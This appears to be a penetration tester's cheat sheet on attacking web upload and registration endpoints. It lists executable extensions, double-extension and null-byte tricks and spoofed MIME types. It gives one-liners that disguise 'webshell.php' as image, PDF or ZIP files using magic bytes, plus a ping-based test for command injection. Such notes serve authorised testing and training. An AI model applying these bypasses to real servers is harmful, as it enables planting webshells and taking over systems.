User Endpoints

File Upload Filtering

Executable extensions

.php -> Standard extension for PHP scripts.

.php5 -> Used for PHP version 5 scripts.

.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.

.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.

.phps -> Typically used for PHP source code highlighting.

.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.

.asp -> Active Server Pages, Microsoft’s server-side scripting technology.

.aspx -> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.

.jsp -> Java Server Pages, used for dynamic web applications in Java environments.

Test filters

• There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:

• File extension :

  • Double extensions:

    • .png.php, .jpg.php, .png.asp, .gif.jsp

  • Null byte injection:

    • file.php%00.jpg, file.asp%00.png

• Content-Type headers:

  • Executable types:

    • application/x-php

    • application/x-sh

    • application/x-msdownload

    • application/x-python-code

  • Image Types:

    • image/png,image/jpeg, image/gif, image/bmp, image/svg+xml

  • MIME Confusion:

    • text/html instead of application/json

    • text/plain to trick servers.

• Magic bytes (file signature)

  • Online hex editor -> HexED.it

PNG

echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG

echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF

echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF

echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP

echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

Check Input Sanitation/Validation

Submit especial characters in the request

!@#$%^&*()

In Linux IP addresses can be written in decimal and HEX, this can be useful if dots are blacklisted.

Prove the Injection

• If you find a command injection, test whether the system can establish outbound connections to an external server:

ping+10.10.10.10

• And wait for it with tcpdump:

tcpdump -i tun0 icmp

Identifying GET-based Registration

When applications use GET requests for registration, credentials are typically passed as URL parameters. This often indicates one of two architectural patterns:

This results in sensitive data being logged in

• Apache/Nginx access logs: Complete URLs with credentials in plaintext

• Proxy server logs: Corporate proxies, CDNs, and load balancers

• Browser history: Local storage of registration URLs

• Referrer headers: Potential leakage when users navigate to external sites

Combined authentication endpoint

• The application performs a database lookup for existing credentials and creates new accounts if none exist.

Additional Attack Vectors

• CSRF vulnerabilities: GET requests don't require CSRF tokens, enabling cross-site request forgery

• URL sharing risks: Accidental credential disclosure through bookmark sharing or copy-paste actions

• Caching issues: Browsers and intermediary systems may cache sensitive URLs